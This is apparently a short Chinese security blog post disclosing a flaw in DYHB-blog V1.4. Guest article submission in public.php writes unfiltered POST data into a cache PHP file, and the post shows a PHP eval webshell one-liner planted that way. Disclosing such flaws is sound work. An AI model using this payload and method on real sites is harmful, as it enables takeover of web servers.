DYHB-blog V1.4 PHP CMS 博客系统直接写马漏洞。
刚下载来看一开始就看到,运气真好。
public.php 文件,游客发布文章……
经典对白看代码。
public.php: if($view=="save"){ |
get_argpost 是获取 POST。
没有任何的过滤,然后悲剧在,生成缓存文件,生成过程就不看了。
width\cache\c_cms_newlog.php
缓存文件开头没有 <? exit();?>,看第一段内容:
a:2:{i:0;a:1:{i:0;a:57:{i:0;s:1:"3";s:7:"blog_id";s:1:"3";i:1;s:24:"<? eval($_POST[xxxx]);?>"
直接执行这个 POST 过来的内容……
直接XX了……